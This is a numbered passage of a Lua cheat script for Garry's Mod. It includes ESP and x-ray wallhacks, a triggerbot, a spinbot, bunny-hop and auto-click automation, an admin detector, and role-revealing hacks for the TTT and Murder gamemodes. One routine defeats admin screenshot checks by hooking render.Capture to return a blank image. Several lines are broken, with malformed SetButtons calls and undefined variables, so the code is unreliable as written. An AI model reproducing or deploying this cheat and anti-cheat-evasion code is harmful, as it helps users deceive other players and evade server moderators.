  1547. Mixer:SetAlphaBar( true ) --Show/hide the alpha bar DEF:true
  1548. Mixer:SetWangs( true ) --Show/hide the R G B A indicators DEF:true
  1549. Mixer:SetColor( GColScheme ) --Set the default color
  1550. Mixer.ValueChanged = function(Mixer, color)
  1551. GColScheme = color
  1552. --LocalPlayer():ConCommand("jav_colour_r "..color.r)
  1553. --LocalPlayer():ConCommand("jav_colour_g "..color.g)
  1554. --LocalPlayer():ConCommand("jav_colour_b "..color.b)
  1555. end
  1557. end)
  1559. /*------------------------------------------
  1560. ESP
  1561. ------------------------------------------*/
  1562. local function JavESP()
  1563. local ColScheme2 = Color(GColScheme.r, GColScheme.g, GColScheme.b, 255)
  1564. local ColScheme3 = Color(math.Clamp(ColScheme2.r + 100, 0, 255), math.Clamp(ColScheme2.g + 100, 0, 255), math.Clamp(ColScheme2.b + 100, 0, 255), 255)
  1565. local ColScheme4 = Color(math.Clamp(ColScheme2.r - 100, 0, 255), math.Clamp(ColScheme2.g - 100, 0, 255), math.Clamp(ColScheme2.b - 100, 0, 255), 255)
  1566. if GetConVarNumber("jav_esp_enabled") == 1 then
  1567. for k, e in pairs( player.GetAll() ) do
  1568. local TeamColor = team.GetColor(e:Team())
  1569. local Dist = math.floor(e:GetPos():Distance(LocalPlayer():GetPos()))
  1570. local DrawDist = (GetConVarNumber("jav_esp_distance") / 0.02)
  1571. local Meters = (math.floor(Dist * 0.02))
  1572. local CircleSize = Dist / Dist * 10
  1573. local wep = "Unknown"
  1574. local SteamID = e:SteamID()
  1575. local Name = e:Nick()
  1576. local Group = e:GetUserGroup()
  1577. local plypos = ( e:GetPos() + Vector( 0, 0, 40 ) ):ToScreen();
  1578. local maxX, minX, maxY, minY, maxX2, minX2, maxY2, minY2, minYhp, maxYhp = CreatePos( e )
  1579. local derp = (( e:GetPos() + e:GetVelocity() / 2) + Vector(0,0,40)):ToScreen()
  1580. local derp2 = (( e:GetPos() + e:GetVelocity() / 4) + Vector(0,0,40)):ToScreen()
  1583. if ( e != LocalPlayer() && IsCloseEnough(e)) then
  1584. if (Dist < DrawDist) then
  1585. if GetConVarNumber("jav_esp_position") == 1 && GetConVarNumber("jav_esp_budget") == 0 then
  1586. if e:Alive() then
  1587. if e:GetFriendStatus() == "friend" then
  1588. surface.DrawCircle(plypos.x, plypos.y, CircleSize, Color(0,255,0,255))
  1589. elseif Group ~= "user" then
  1590. surface.DrawCircle(plypos.x, plypos.y, CircleSize, ColScheme3)
  1591. else
  1592. surface.DrawCircle(plypos.x, plypos.y, CircleSize, ColScheme2)
  1593. end
  1594. surface.DrawCircle(plypos.x, plypos.y, CircleSize - 3, ColScheme4)
  1596. else
  1597. surface.SetDrawColor(255,255,255,255)
  1598. surface.DrawLine( plypos.x - 10, plypos.y - 10, plypos.x +10 , plypos.y + 10 )
  1599. surface.DrawLine( plypos.x + 10, plypos.y - 10, plypos.x - 10 , plypos.y + 10 )
  1600. end
  1601. elseif GetConVarNumber("jav_esp_position") == 1 && GetConVarNumber("jav_esp_budget") == 1 then
  1602. surface.SetDrawColor(255,255,255,255)
  1603. surface.DrawRect( plypos.x - 4, plypos.y - 4, 8 , 8 )
  1604. end
  1605. if GetConVarNumber("jav_esp_box") == 1 then
  1606. surface.SetDrawColor(255,150,0,255)
  1607. surface.DrawLine( maxX, maxY, maxX, minY )
  1608. surface.DrawLine( maxX, minY, minX, minY )
  1609. surface.DrawLine( minX, minY, minX, maxY )
  1610. surface.DrawLine( minX, maxY, maxX, maxY )
  1611. end
  1612. if GetConVarNumber("jav_esp_velocity") == 1 then
  1613. surface.DrawCircle(derp.x, derp.y, CircleSize +3, ColScheme2)
  1614. surface.DrawCircle(derp2.x, derp2.y, CircleSize - 6, ColScheme2)
  1615. end
  1616. if GetConVarNumber("jav_esp_names") == 1 then
  1617. if GetConVarNumber("jav_esp_budget") == 1 then
  1618. draw.SimpleText( Name, "Trebuchet18", plypos.x - 15, plypos.y - 20, ColScheme3,4,1)
  1619. else
  1620. draw.SimpleTextOutlined( Name, "Trebuchet18", plypos.x - 15, plypos.y - 20, ColScheme3,4,1,1,Color(0,0,0))
  1621. end
  1622. end
  1624. if GetConVarNumber("jav_ttthax") == 1 && e.HatTraitor == true then
  1625. draw.SimpleTextOutlined( "TRAITOR", "Trebuchet18", plypos.x - 20, plypos.y - 35, Color(255,0,0),4,1,1,Color(0,0,0))
  1626. end
  1629. if GetConVarNumber("jav_esp_showtargetdistance") == 1 then
  1630. if GetConVarNumber("jav_esp_budget") == 1 then
  1631. draw.SimpleText( Meters.."m", "Trebuchet18", plypos.x - 12, plypos.y + 20, ColScheme4,4,1)
  1632. else
  1633. draw.SimpleTextOutlined( Meters.."m", "Trebuchet18", plypos.x - 12, plypos.y + 20, ColScheme4,4,1,1,Color(0,0,0))
  1634. end
  1635. end
  1637. if GetConVarNumber("jav_esp_admin") == 1 then
  1638. if Group ~= "user" then
  1639. if GetConVarNumber("jav_esp_budget") == 1 then
  1640. draw.SimpleText( Group, "Trebuchet18", plypos.x - 12, plypos.y + 35, Color(200,200,200,255),4,1)
  1641. else
  1642. draw.SimpleTextOutlined( Group, "Trebuchet18", plypos.x - 12, plypos.y + 35, Color(200,200,200,255),4,1,1,Color(0,0,0))
  1643. end
  1644. end
  1645. end
  1647. end
  1648. end
  1649. end
  1650. end
  1651. end
  1652. hook.Add("HUDPaint", "JavESP", JavESP)
  1654. /*------------------------------------------
  1655. Xray
  1656. ------------------------------------------*/
  1658. local Matinfo = {
  1659. ["$basetexture"] = "models/debug/debugwhite",
  1660. ["$model"] = 1,
  1661. ["$nocull"] = 1,
  1662. ["$ignorez"] = 1
  1663. }
  1665. mat1 = (CreateMaterial( "chams", "VertexLitGeneric", Matinfo ))
  1666. mat2 = (CreateMaterial( "wireframe", "Wireframe", Matinfo ))
  1667. trans = Color(0, 255, 0, 80)
  1668. trans2 = Color(0, 255, 100)
  1669. trans3 = Color(255, 155, 0, 200)
  1671. function Xray()
  1672. local ColScheme = Color(GColScheme.r, GColScheme.g, GColScheme.b, 100)
  1673. local ColSchemeV = Vector(ColScheme.r / 255, ColScheme.g / 255, ColScheme.b / 255)
  1674. local ColSchemeV2 = Vector(math.Clamp(ColSchemeV.x + 0.2, 0, 1), math.Clamp(ColSchemeV.y + 0.5, 0, 1), math.Clamp(ColSchemeV.z + 0.2, 0, 1))
  1675. local Dist = (GetConVarNumber("jav_xray_distance") / 0.02 )
  1676. if !xray then
  1677. xray = true
  1678. hook.Add("HUDPaint", "xxrayz", function()
  1679. for k,v in pairs(ents.GetAll()) do
  1680. local position = (v:GetPos()+Vector(0,0,80)):ToScreen()
  1681. if v:GetClass()== "prop_physics" and position.x<ScrW() and position.x>0 and position.y<ScrH() and position.y>0 and (LocalPlayer():GetPos():Distance(v:GetPos()) < Dist) then
  1682. cam.Start3D(EyePos(),EyeAngles())
  1683. v:SetMaterial(mat2)
  1684. v:SetRenderMode(4)
  1685. v:SetColor(ColScheme)
  1686. render.SuppressEngineLighting( true )
  1687. render.MaterialOverride( mat1 )
  1688. render.SetColorModulation( ColSchemeV.x, ColSchemeV.y, ColSchemeV.z)
  1689. render.SetBlend(0.3)
  1690. v:DrawModel()
  1691. render.SetBlend(1)
  1692. render.SuppressEngineLighting( false )
  1693. render.MaterialOverride( )
  1694. cam.End3D()
  1695. elseif v:GetClass()==("prop_door_rotating") or v:GetClass()==("func_door_rotating") then
  1696. v:SetMaterial("models/wireframe")
  1697. v:SetColor(ColScheme)
  1698. elseif v:IsPlayer() && v:Alive() then
  1699. cam.Start3D(EyePos(),EyeAngles())
  1700. v:SetMaterial(mat2)
  1701. v:SetRenderMode(4)
  1702. v:SetColor(ColScheme)
  1703. render.SuppressEngineLighting( true )
  1704. render.MaterialOverride( mat1 )
  1705. render.SetColorModulation( ColSchemeV2.x, ColSchemeV2.y, ColSchemeV2.z )
  1706. render.SetBlend(0.3)
  1707. v:DrawModel()
  1708. render.SetBlend(1)
  1709. render.SuppressEngineLighting( false )
  1710. render.MaterialOverride( )
  1711. cam.End3D()
  1712. end
  1713. end
  1714. end)
  1715. elseif xray then
  1716. xray = false
  1717. for k,v in pairs(ents.GetAll()) do
  1718. if v:GetClass()==("prop_door_rotating") or v:GetClass()==("func_door_rotating") or v:GetClass()== "prop_physics" or v:IsPlayer() then
  1719. v:SetMaterial("")
  1720. v:SetColor(Color(255,255,255))
  1721. end
  1722. end
  1723. hook.Remove("HUDPaint", "xxrayz")
  1724. end
  1725. end
  1726. concommand.Add("jav_xray_toggle",Xray)
  1730. /*------------------------------------------
  1731. Crosshair
  1732. ------------------------------------------*/
  1733. hook.Add( "HUDPaint", "jav_crosshair", function( )
  1734. if GetConVarNumber("jav_crosshair_enabled") == 1 then
  1735. surface.DrawCircle(ScrW()/2, ScrH()/2, 14, Color(255,100,0,255))
  1736. surface.DrawCircle(ScrW()/2, ScrH()/2, 2, Color(75,0,0,255))
  1737. end
  1738. end)
  1740. /*------------------------------------------
  1741. Rear Vision Mirror
  1742. ------------------------------------------*/
  1743. hook.Add( "HUDPaint", "jav_mirror", function( )
  1744. if GetConVarNumber("jav_mirror_enabled") == 1 then
  1745. local CamData = {}
  1746. local ang = LocalPlayer():EyeAngles()
  1747. CamData.angles = Angle(ang.p - ang.p - ang.p, ang.y - 180, ang.r)
  1748. CamData.origin = LocalPlayer():GetShootPos()
  1749. CamData.x, CamData.y, CamData.w, CamData.h = 1620, 0, 300, 300
  1750. render.RenderView( CamData )
  1751. draw.RoundedBox(1, (ScrW() / 2) - 1.5, (ScrH() / 2) - 1.5, 3, 3, Color(255,255,255,255))
  1752. end
  1753. end )
  1756. /*------------------------------------------
  1757. Triggerbot
  1758. ------------------------------------------*/
  1760. local toggler = 0
  1762. local function triggerbot(cmd)
  1763. if GetConVarNumber("jav_triggerbot_enabled") == 1 then
  1764. if LocalPlayer():Alive() then
  1765. local td = {start = LocalPlayer():GetShootPos(), endpos = LocalPlayer():GetShootPos() + LocalPlayer():EyeAngles():Forward() * 65535, filter = LocalPlayer(), mask = MASK_SHOT}
  1766. local tr = util.TraceLine(td)
  1767. local target = tr.Entity
  1768. if target:IsValid() then
  1769. if IsValid(LocalPlayer():GetActiveWeapon()) then
  1770. if LocalPlayer():GetActiveWeapon():Clip1() > 0 then
  1771. if target:IsPlayer() or target:IsNPC() then
  1772. if toggler == 0 then
  1773. cmd:SetButtons(bit.bor(cmd:GetButtons(), IN_ATTACK))
  1774. toggler = 1
  1775. else
  1776. cmd:SetButtons(, bit.bnot(IN_ATTACK)))
  1777. toggler = 0
  1778. end
  1779. end
  1780. end
  1781. end
  1782. end
  1783. end
  1784. end
  1785. end
  1787. hook.Add("CreateMove", "triggerbot", triggerbot)
  1789. /*------------------------------------------
  1790. TTT Magneto Toss
  1791. ------------------------------------------*/
  1793. function SpinBot()
  1794. timer.Simple(.02,Turn)
  1795. timer.Simple(.04,Turn)
  1796. timer.Simple(.06,Turn)
  1797. timer.Simple(.08,Turn)
  1798. timer.Simple(.10,Turn)
  1799. timer.Simple(.12,Turn)
  1800. timer.Simple(.14,Turn)
  1801. timer.Simple(.16,Turn)
  1802. timer.Simple(.18,Turn)
  1803. timer.Simple(.20,Turn)
  1804. timer.Simple(.22,Turn)
  1805. timer.Simple(.24,Turn)
  1806. timer.Simple(.26,Turn)
  1807. timer.Simple(.28,Turn)
  1808. timer.Simple(.30,Turn)
  1809. timer.Simple(.32,Turn)
  1810. timer.Simple(.34,Turn)
  1811. timer.Simple(.36,Turn)
  1812. timer.Simple(.38,Turn)
  1813. timer.Simple(.40,Turn)
  1814. timer.Simple(.42,Turn)
  1815. timer.Simple(.44,Turn)
  1816. timer.Simple(.46,Turn)
  1817. timer.Simple(.48,Turn)
  1818. timer.Simple(.50,Turn)
  1819. timer.Simple(.52,Turn)
  1820. timer.Simple(.54,Turn)
  1821. timer.Simple(.56,Turn)
  1822. timer.Simple(.58,Turn)
  1823. timer.Simple(.60,Turn)
  1824. timer.Simple(.62,Turn)
  1825. timer.Simple(.64,Turn)
  1826. timer.Simple(.66,Turn)
  1827. timer.Simple(.68,Turn)
  1828. timer.Simple(.70,Turn)
  1829. timer.Simple(.72,Turn)
  1830. end
  1832. function Turn()
  1833. -- Turn function
  1834. LocalPlayer():SetEyeAngles(LocalPlayer():EyeAngles()-Angle(0,10,0))
  1835. end
  1837. local spinning = false
  1838. concommand.Add( "jav_spinbot", function()
  1839. spinning = !spinning
  1840. if( spinning ) then
  1841. SpinBot()
  1842. timer.Create( "spinning", 0.74, 0, function()
  1843. SpinBot()
  1844. end )
  1845. else
  1846. timer.Destroy( "spinning" )
  1847. end
  1848. end )
  1850. /*------------------------------------------
  1851. Bhop Script
  1852. ------------------------------------------*/
  1853. hook.Add( "CreateMove", "jav_bhop", function( cmd )
  1855. if GetConVarNumber("jav_bhop_enabled") == 1 then
  1856. if !LocalPlayer():IsFlagSet( FL_ONGROUND ) then
  1857. cmd:SetButtons( cmd:GetButtons(), bit.bnot( IN_JUMP ) ) )
  1858. end
  1859. end
  1861. end )
  1863. /*------------------------------------------
  1864. Auto Clicker
  1865. ------------------------------------------*/
  1867. local spam = 0
  1869. local function autoclick(cmd)
  1870. if GetConVarNumber("jav_autoclick_enabled") == 1 then
  1871. if LocalPlayer():Alive() && input.IsMouseDown( 107 ) then
  1872. if spam == 0 then
  1873. cmd:SetButtons(bit.bor(cmd:GetButtons(), IN_ATTACK))
  1874. spam = 1
  1875. else
  1876. cmd:SetButtons(, bit.bnot(IN_ATTACK)))
  1877. spam = 0
  1878. end
  1879. end
  1881. if LocalPlayer():Alive() && input.IsMouseDown( 108 ) then
  1882. if spam == 0 then
  1883. cmd:SetButtons(bit.bor(cmd:GetButtons(), IN_ATTACK2))
  1884. spam = 1
  1885. else
  1886. cmd:SetButtons(, bit.bnot(IN_ATTACK2)))
  1887. spam = 0
  1888. end
  1889. end
  1891. end
  1892. end
  1894. hook.Add("CreateMove", "autoclick2", autoclick)
  1896. /*------------------------------------------
  1897. Flashlight Spammer
  1898. ------------------------------------------*/
  1900. hook.Add( "Think", "jav_flashlight", function()
  1902. if GetConVarNumber("jav_flashlight_enabled") == 1 && input.IsKeyDown(KEY_F) then
  1903. LocalPlayer():ConCommand("impulse 100")
  1904. end
  1906. end )
  1909. /*------------------------------------------
  1910. Admin Detector
  1911. ------------------------------------------*/
  1913. concommand.Add("jav_printadmins", function()
  1914. local plys = player.GetAll()
  1915. for k, v in pairs(plys) do
  1916. if v:GetNWString("usergroup") != "user" then
  1917. print(v:GetName() .. string.rep("\t", math.Round(8 / #v:GetName())), v:GetNWString("usergroup"))
  1918. end
  1919. end
  1920. end)
  1923. concommand.Add("jav_toggle", function()
  1924. if GetConVarNumber("jav_autoaim_enabled") == 0 then
  1925. LocalPlayer():ConCommand("jav_autoaim_enabled 1")
  1926. elseif GetConVarNumber("jav_autoaim_enabled") == 1 then
  1927. LocalPlayer():ConCommand("jav_autoaim_enabled 0")
  1928. end
  1929. end)
  1931. /*------------------------------------------
  1932. Witness Script
  1933. ------------------------------------------*/
  1935. local Cap = math.cos(math.rad(45))
  1936. local Offset = Vector(0, 0, 32)
  1937. local Trace = {}
  1938. local WitnessColor = Color (0,0,0)
  1940. function Draw()
  1941. if GetConVarNumber("jav_witness_enabled") == 1 then
  1942. local Time = os.time() - 1
  1943. local Witnesses = 0
  1944. local BeingWitnessed = true
  1946. if Time < os.time() then
  1947. Time = os.time() + .5
  1948. Witnesses = 0
  1949. BeingWitnessed = false
  1950. for k, pla in pairs(player.GetAll()) do
  1951. if pla:IsValid() and pla != LocalPlayer() then
  1952. Trace.start = LocalPlayer():EyePos() + Offset
  1953. Trace.endpos = pla:EyePos() + Offset
  1954. Trace.filter = {pla, LocalPlayer()}
  1956. TraceRes = util.TraceLine(Trace)
  1958. if !TraceRes.Hit then
  1959. if (pla:EyeAngles():Forward():Dot((LocalPlayer():EyePos() - pla:EyePos())) > Cap) then
  1960. Witnesses = Witnesses + 1
  1961. BeingWitnessed = true
  1963. end
  1964. end
  1965. end
  1966. end
  1967. end
  1969. if BeingWitnessed == false then
  1970. WitnessColor = Color (200,150,0)
  1971. else
  1972. WitnessColor = Color (255,0,0)
  1973. end
  1974. draw.SimpleTextOutlined( Witnesses.." People can see you", "Trebuchet18", (ScrW() / 2) - 65, 30, Color(255,150,0),4,1,1,Color(0,0,0))
  1975. surface.SetDrawColor( WitnessColor )
  1976. surface.DrawRect( (ScrW() / 2) - 65, 40, 120, 4 )
  1978. end
  1979. end
  1980. hook.Add("HUDPaint", "WitnessesBox", Draw)
  1982. /*------------------------------------------
  1983. Anti Screenshot (taken from lennys scripts)
  1984. ------------------------------------------*/
  1987. local missingpng = file.Read("materials/missing256.png", "GAME")
  1991. /*
  1992. ###############
  1994. ###############
  1995. */
  1996. local actualRenderCapture = _G.render.Capture
  1997. local encodeData = util.Base64Encode;
  1999. local enabled = CreateClientConVar("jav_antiscreenshot", "1")
  2000. local function antiscreenshot()
  2001. if enabled:GetBool() then
  2002. _G.render.Capture = function(data)
  2003. if data.format == "jpeg" then
  2004. return missingpng
  2005. elseif data.format == "png" then
  2006. return missingpng
  2007. end
  2008. end
  2010. util.Base64Encode = function( str )
  2011. local encoding = encodeData( missingpng );
  2013. return( noided_dummy );
  2014. end
  2015. else
  2016. _G.render.Capture = actualRenderCapture
  2017. util.Base64Encode = encodeData;
  2018. end
  2019. end
  2020. antiscreenshot()
  2021. cvars.AddChangeCallback("jav_antiscreenshot", antiscreenshot)
  2024. /*------------------------------------------
  2025. Murder Hax (originally coded by deagler)
  2026. ------------------------------------------*/
  2029. local function murderhaks()
  2030. if GetConVarNumber("jav_murderhax") == 1 then
  2031. for _,v in pairs (player.GetAll()) do
  2032. for k2, v2 in pairs(v:GetWeapons()) do
  2033. if string.find(v2:GetPrintName(), "Knife") then
  2034. local man = v2.Owner
  2035. local pos = (man:GetPos() + Vector(0,0,60)):ToScreen()
  2036. local col = man:GetPlayerColor()
  2038. draw.SimpleTextOutlined( "Murderer!", "Trebuchet20", plypos.x - 32, plypos.y - 40, Color(255, 0, 0),4,1,1,Color(0,0,0))
  2039. end
  2040. if string.find(v2:GetPrintName(), "Magnum") and v2.Owner then
  2041. local man = v2.Owner
  2042. local pos = (man:GetPos() + Vector(0,0,60)):ToScreen()
  2043. local col = man:GetPlayerColor()
  2045. draw.SimpleTextOutlined( "Gun Holder", "Trebuchet20", plypos.x - 36, plypos.y - 40, Color(255, 255, 0),4,1,1,Color(0,0,0))
  2046. end
  2047. end
  2048. end
  2051. for b,c in pairs(ents.FindByClass("mu_loot")) do
  2052. local pos = ( c:GetPos() + Vector( 0,0,30 ) ):ToScreen()
  2053. local LootDist = (math.floor(c:GetPos():Distance(LocalPlayer():GetPos())) / 0.02)
  2054. draw.SimpleTextOutlined( "Loot "..LootDist.."m", "Trebuchet18", pos.x, pos.y, Color( 0, 255, 0, 255 ),4,1,1,Color(0,0,0))
  2055. end
  2056. end
  2057. end
  2059. hook.Add("RenderScreenspaceEffects", "murderhax", murderhaks)
  2061. /*------------------------------------------
  2062. TTT Hax
  2063. ------------------------------------------*/
  2065. local matOverlay = Material( "sprites/glow08" )
  2066. local matTraitor = Material( "sprites/dot" )
  2067. local twep = {"spiderman's_swep", "weapon_ttt_trait_defilibrator", "weapon_ttt_xbow", "weapon_ttt_dhook", "weapon_awp", "weapon_ttt_ak47", "weapon_jihadbomb", "weapon_ttt_knife", "weapon_ttt_c4", "weapon_ttt_decoy", "weapon_ttt_flaregun", "weapon_ttt_phammer", "weapon_ttt_push", "weapon_ttt_radio", "weapon_ttt_sipistol", "weapon_ttt_teleport", "weapon_ttt_awp", "weapon_mad_awp", "weapon_real_cs_g3sg1", "weapon_ttt_cvg_g3sg1", "weapon_ttt_g3sg1", "weapon_ttt_healthstation5", "weapon_ttt_sentry", "weapon_ttt_poison_dart", "weapon_ttt_trait_defibrillator"}
  2069. for _,v in pairs(player.GetAll()) do
  2070. v.HatTraitor = nil
  2071. end
  2072. for _,v in pairs(ents.GetAll()) do
  2073. v.HatESPTracked = nil
  2074. end
  2076. hook.Add("PostDrawOpaqueRenderables", "wire_animations_idle", function()
  2077. if GetConVarNumber("jav_ttthax") == 1 then
  2078. if GAMEMODE.round_state != ROUND_ACTIVE then
  2079. for _,v in pairs(player.GetAll()) do
  2080. v.HatTraitor = nil
  2081. end
  2082. for _,v in pairs(ents.GetAll()) do
  2083. v.HatESPTracked = nil
  2084. end
  2085. return
  2086. end
  2087. for _,v in pairs( ents.GetAll() ) do
  2088. if v and IsValid(v) and (table.HasValue(twep, v:GetClass()) and !v.HatESPTracked) then
  2089. local pl = v.Owner
  2090. if pl and IsValid(pl) and pl:IsTerror() then
  2091. if pl:IsDetective() then
  2092. v.HatESPTracked = true
  2093. else
  2094. v.HatESPTracked = true
  2095. pl.HatTraitor = true
  2096. chat.AddText( pl, Color(255,125,0), " is a ",Color(255,0,0), "TRAITOR",Color(255,125,0), " with a ",Color(255,0,0),v:GetClass().."!")
  2097. end
  2098. end
  2099. end
  2100. end
  2102. end
  2104. end)
  2106. /*------------------------------------------
  2107. DarkRP name changer (taken from lennys scripts)
  2108. ------------------------------------------*/
  2110. firstname = {
  2111. "Richard",
  2112. "Jack",
  2113. "John",
  2114. "Luke",
  2115. "Cameron",
  2116. "Joe",
  2117. "Peter",
  2118. "Aaron",
  2119. "Chris",
  2120. "Matthew",
  2121. "Paul",
  2122. "Floyd",
  2123. "Trevor",
  2124. "Travis",
  2125. "Owen",
  2126. "Seth",
  2127. "Nathan",
  2128. "Alan",
  2129. "Dale",
  2130. "Albert",
  2131. "Blake",
  2132. "William",
  2133. "Ben",
  2134. "Bruce",
  2135. "Byron",
  2136. "Brad",
  2137. "Carlos",
  2138. "Craig",
  2139. "Cory",
  2140. "Cole",
  2141. "Carter",
  2142. "Connor",
  2143. "Duncan",
  2144. "Dwight",
  2145. "Dominic",
  2146. "Eli",
  2147. "Derrick",
  2148. "Brett",
  2149. "Brian",
  2150. "Charles",
  2151. "Isaac",
  2152. "Gavin",
  2153. "Dylan",
  2154. "Elvis",
  2155. "Kyle",
  2156. "Kurt",
  2157. "Kevin",
  2158. "Justin",
  2159. "Michael",
  2160. "Max",
  2161. "Mario",
  2162. "Leonardo",
  2163. "Liam",
  2164. "Norman",
  2165. "Oliver",
  2166. "Ray",
  2167. "Troy",
  2168. "Xavier",
  2169. "Zack",
  2170. "Alanna",
  2171. "Abby",
  2172. "Alice",
  2173. "Amber",
  2174. "Beatrice",
  2175. "Beth",
  2176. "Bridget",
  2177. "Kate",
  2178. "Clara",
  2179. "Carol",
  2180. "Cassie",
  2181. "Jane",
  2182. "Fiona",
  2183. "Cynthia",
  2184. "Deborah",
  2185. "Denise",
  2186. "Diana",
  2187. "Elise",
  2188. "Lisa",
  2189. "Lacey",
  2190. "Emma",
  2191. "Gabriel",
  2192. "Hayley",
  2193. "Harley",
  2194. "Heidi",
  2195. "Holly",
  2196. "Ivy",
  2197. "Helen",
  2198. "Jamie",
  2199. "Jackie",
  2200. "Jenna",
  2201. "Josephine",
  2202. "Julia",
  2203. "Kelly",
  2204. "Lara",
  2205. "Lily",
  2206. "Maia",
  2207. "Amanda",
  2208. "Mary",
  2209. "Margaret",
  2210. "Sarah",
  2211. "Sydney",
  2212. "Racheal",
  2213. "Wilson",
  2214. "Kane",
  2215. "David"
  2216. }
  2218. lastname = {
  2219. "Smith",
  2220. "Jones",
  2221. "Anderson",
  2222. "Morgan",
  2223. "Freeman",
  2224. "Wilson",
  2225. "Williams",
  2226. "Brown",
  2227. "Taylor",
  2228. "Martin",
  2229. "White",
  2230. "Howard",
  2231. "Bieber",
  2232. "Cooper",
  2233. "Gray",
  2234. "Hardy",
  2235. "Thompson",
  2236. "Baron",
  2237. "Finnegan",
  2238. "McDonald",
  2239. "Doyle",
  2240. "Parker",
  2241. "Dawson",
  2242. "Mcintyre",
  2243. "Redwood",
  2244. "Sutherland",
  2245. "Harris",
  2246. "Presley",
  2247. "Cole",
  2248. "Corne",
  2249. "Colin",
  2250. "Lacey",
  2251. "Hall",
  2252. "Hulley",
  2253. "Rayner",
  2254. "Cashen",
  2255. "Seng",
  2256. "Miller",
  2257. "Ludon",
  2258. "Curry",
  2259. "Watson",
  2260. "Holmes",
  2261. "Cartman",
  2262. "Lane",
  2263. "Porter",
  2264. "Fletcher",
  2265. "Hunter",
  2266. "Lynch",
  2267. "Corbett",
  2268. "Barry",
  2269. "Kennedy",
  2270. "Riley",
  2271. "Davis",
  2272. "Lennon",
  2273. "Odinsson",
  2274. "Robson",
  2275. "Ferris",
  2276. "Pearce",
  2277. "Walter",
  2278. "Cruz",
  2279. "Pratchett",
  2280. "Hayes",
  2281. "Danliels",
  2282. "Gregory",
  2283. "Doe",
  2284. "Nelson",
  2285. "Hale",
  2286. "Bryan",
  2287. "Ford",
  2288. "Holden",
  2289. "Burns",
  2290. "Mcneal",
  2291. "Deere"
  2292. }
  2295. function randomrpname()
  2296. LocalPlayer():ConCommand("darkrp rpname "..table.Random(firstname).." "..table.Random(lastname))
  2297. end
  2298. concommand.Add("jav_newname",randomrpname)
  2302. /*------------------------------------------
  2303. Spirit Walk
  2304. ------------------------------------------*/
  2307. local SW = {}
  2309. SW.Enabled = false
  2310. SW.ViewOrigin = Vector( 0, 0, 0 )
  2311. SW.ViewAngle = Angle( 0, 0, 0 )
  2312. SW.Velocity = Vector( 0, 0, 0 )
  2314. function SW.CalcView( ply, origin, angles, fov )
  2315. if ( !SW.Enabled ) then return end
  2316. if ( SW.SetView ) then
  2317. SW.ViewOrigin = origin
  2318. SW.ViewAngle = angles
  2320. SW.SetView = false
  2321. end
  2322. return { origin = SW.ViewOrigin, angles = SW.ViewAngle }
  2323. end
  2324. hook.Add( "CalcView", "SpiritWalk", SW.CalcView )
  2326. function SW.CreateMove( cmd )
  2327. if ( !SW.Enabled ) then return end
  2329. // Add and reduce the old velocity.
  2330. local time = FrameTime()
  2331. SW.ViewOrigin = SW.ViewOrigin + ( SW.Velocity * time )
  2332. SW.Velocity = SW.Velocity * 0.95
  2334. // Rotate the view when the mouse is moved.
  2335. local sensitivity = 0.022
  2336. SW.ViewAngle.p = math.Clamp( SW.ViewAngle.p + ( cmd:GetMouseY() * sensitivity ), -89, 89 )
  2337. SW.ViewAngle.y = SW.ViewAngle.y + ( cmd:GetMouseX() * -1 * sensitivity )
  2339. // What direction we're going to move in.
  2340. local add = Vector( 0, 0, 0 )
  2341. local ang = SW.ViewAngle
  2342. if ( cmd:KeyDown( IN_FORWARD ) ) then add = add + ang:Forward() end
  2343. if ( cmd:KeyDown( IN_BACK ) ) then add = add - ang:Forward() end
  2344. if ( cmd:KeyDown( IN_MOVERIGHT ) ) then add = add + ang:Right() end
  2345. if ( cmd:KeyDown( IN_MOVELEFT ) ) then add = add - ang:Right() end
  2346. if ( cmd:KeyDown( IN_JUMP ) ) then add = add + ang:Up() end
  2347. if ( cmd:KeyDown( IN_DUCK ) ) then add = add - ang:Up() end
  2349. // Speed.
  2350. add = add:GetNormal() * time * 500
  2351. if ( cmd:KeyDown( IN_SPEED ) ) then add = add * 2 end
  2353. SW.Velocity = SW.Velocity + add
  2355. // This stops us looking around crazily while spiritwalking.
  2356. if ( SW.LockView == true ) then
  2357. SW.LockView = cmd:GetViewAngles()
  2358. end
  2359. if ( SW.LockView ) then
  2360. cmd:SetViewAngles( SW.LockView )
  2361. end
  2363. // This stops us moving while spiritwalking.
  2364. cmd:SetForwardMove( 0 )
  2365. cmd:SetSideMove( 0 )
  2366. cmd:SetUpMove( 0 )
  2367. end
  2368. hook.Add( "CreateMove", "SpiritWalk", SW.CreateMove )
  2370. function SW.Toggle()
  2371. SW.Enabled = !SW.Enabled
  2372. SW.LockView = SW.Enabled
  2373. SW.SetView = true
  2375. local status = { [ true ] = "ON", [ false ] = "OFF" }
  2376. print( "SpiritWalk " .. status[ SW.Enabled ] )
  2377. end
  2378. concommand.Add( "jav_spiritwalk", SW.Toggle )
  2380. concommand.Add( "jav_spiritwalk_printpos", function() print( SW.ViewOrigin ) end )
  2383. /*------------------------------------------
  2384. Entity Scanner
  2385. ------------------------------------------*/
  2387. targdist = 0
  2388. targmodel = nil
  2389. targname = nil
  2390. targrank = nil
  2391. targteam = nil
  2392. targteamcolor = Color(255,255,255)
  2393. targhealth = nil
  2394. targactive = nil
  2395. targpos = nil
  2397. function Scanner()
  2398. if GetConVarNumber("jav_scanner_enabled") == 1 then
  2399. local tr = LocalPlayer():GetEyeTrace()
  2400. if not tr.Entity then return end
  2401. local target = tr.Entity
  2403. if target:GetClass():lower() == "player" then
  2404. targdist = (math.floor(target:GetPos():Distance(LocalPlayer():GetPos())) * 0.02 )
  2405. targmodel = target:GetModel()
  2406. targname = target:Nick()
  2407. targrank = target:GetUserGroup()
  2408. targteamcolor = team.GetColor(target:Team())
  2409. targteam = team.GetName(target:Team())
  2410. targhealth = target:Health()
  2411. targindex = target:EntIndex()
  2412. targid = target:SteamID()
  2413. targposx = math.Round(target:GetPos().x)
  2414. targposy = math.Round(target:GetPos().y)
  2415. targposz = math.Round(target:GetPos().z)
  2416. if targid == "NULL" then targid = "Bots have no SteamID" end
  2417. targactive = target:GetActiveWeapon():GetPrintName()
  2418. end
  2421. if target:GetClass():lower() != "player" && target:GetClass():lower() != "worldspawn" then
  2422. targname = target:GetClass()
  2423. targdist = (math.floor(target:GetPos():Distance(LocalPlayer():GetPos())) * 0.02 )
  2424. targmodel = target:GetModel()
  2425. targindex = target:EntIndex()
  2426. targposx = math.Round(target:GetPos().x)
  2427. targposy = math.Round(target:GetPos().y)
  2428. targposz = math.Round(target:GetPos().z)
  2429. targrank = "N/A"
  2430. targteam = "N/A"
